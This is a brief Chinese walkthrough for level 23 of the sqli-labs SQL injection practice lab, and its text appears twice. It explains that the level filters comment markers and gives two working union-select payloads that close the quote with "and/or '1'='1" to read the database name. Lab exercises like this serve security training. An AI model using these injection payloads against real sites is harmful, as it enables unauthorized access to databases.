sqli-labs靶场Less23
1.我们按照前面的的办法可以判断出来它的闭合方式为单引号
2.我们在它的界面上可以看到这一关是过滤了--与#,既然如此我们可以用以下方式来绕过,后面的步骤都可以这一样
?id=-1' union select 1,database(),3 and '1' = '1
?id=-1' union select 1,database(),3 or '1' = '1
1.我们按照前面的的办法可以判断出来它的闭合方式为单引号
2.我们在它的界面上可以看到这一关是过滤了--与#,既然如此我们可以用以下方式来绕过,后面的步骤都可以这一样
?id=-1' union select 1,database(),3 and '1' = '1
?id=-1' union select 1,database(),3 or '1' = '1